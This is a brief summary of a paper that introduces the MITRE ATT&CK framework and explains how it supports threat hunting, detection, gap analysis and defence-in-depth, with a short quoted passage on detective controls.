MITRE ATT&CK is a normalised, structured approach to classifying and describing the methods adversaries use to attack systems, based on real-world observations.
Attackers and defenders constantly respond to each other, so what works today might not tomorrow. MITRE says it works with the community to keep ATT&CK up to date with the ever-changing threat landscape.
This paper introduces ATT&CK and related tools and resources. It also discusses how to make practical use of ATT&CK with a focus on threat hunting and detection.
ATT&CK can help perform gap analysis of malicious behaviour, enhance threat detection and test detection rules to provide assurance.
Detection, page 9
Preventing attackers from using techniques is critical . Implementing detective controls is also important because 1) defence-in-depth requires layered defences against any given threat (all eggs in one basket), and 2) as mentioned earlier, you can’t prevent all techniques . Therefore, ATT&CK provides extensive guidance on how to detect the use of techniques by attackers with logs and other sources of security analytics at your disposal .